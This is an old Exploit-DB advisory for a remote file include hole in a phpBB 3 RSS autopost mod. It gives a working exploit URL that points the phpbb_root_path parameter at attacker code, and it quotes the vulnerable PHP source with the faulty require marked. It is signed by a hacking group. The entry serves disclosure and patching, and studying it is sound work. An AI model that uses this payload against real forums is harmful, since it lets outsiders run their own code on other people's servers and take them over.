phpBB 3 autopost bot mod <= 0.1.3 Remote File Include Vulnerability

2009-02-20T00:00:00
ID EDB-ID:8083
Type exploitdb
Reporter Kacper
Modified 2009-02-20T00:00:00

Description

phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            phpBB 3 (autopost bot mod &lt;= 0.1.3) Remote File Include Vulnerability

Vulnerability author: Kacper

Greetz: all DEVIL TEAM forum members.


Author Website: http://devilteam.pl/
                http://polskihacking.pl/



Mod Description:
This mod automatically post content from RSS feed into destination forum.
MOD Download: http://phpbb3.smika.net/
Demo: http://phpbb3.smika.net

dont work when php5 or newest.

Vulnerability:

http://site.cz/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]

------------------------------------------------------------------

Bad codE:

includes/functions_lastrss_autopost.php - line 204 - 240:

[code]
if($config['lastrss_ap_enabled'])                                        &lt;-----{1}
{
  // init & setup lastrss
  // $rss can be already initiated by lastRSS agregator mod by SmiX
  if(!isset($rss))                                                       &lt;-----{2}
  {
    require $phpbb_root_path . 'includes/class_lastrss.' . $phpEx;                                   &lt;-----{3}
    $rss = new lastrss;	
  }
  // init/change settings for lastrss autopost bot
  $rss-&gt;cache_time = 0;                                         // not used in this mod
  $rss-&gt;items_limit = $config['lastrss_ap_items_limit'];        // default limit of items to post
  $rss-&gt;type = $config['lastrss_type'];                         // connection type (fopen / curl)

  // init lastRSS autopost MOD !
  // check if we have some feeds in database to check
  $sql = 'SELECT *
		      FROM ' . LASTRSS_AP_TABLE . '
		      WHERE next_check &lt; "' . time() . '" AND enabled = "1"';
  $result	= $db-&gt;sql_query($sql);
	$row = $db-&gt;sql_fetchrow($result);
	$db-&gt;sql_freeresult($result);
  // so do we have some feeds to post ?
  if(sizeof($row) &gt; 0)
  {
    // we are already sure, that at least one feed exists!
    $feed = get_next_feed_to_post(); 
  }

  // do we have some feed data ?
  if (isset($feed) && (sizeof($feed) &gt; 0))
  {  
    // we are sure, we have feed info for checking the feed!
    autopost_init($feed);
  }
}
?&gt;
[/code]

------------------------------------------------------------------

Zapraszam na forum DEVIL TEAM, 
google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl

# milw0rm.com [2009-02-20]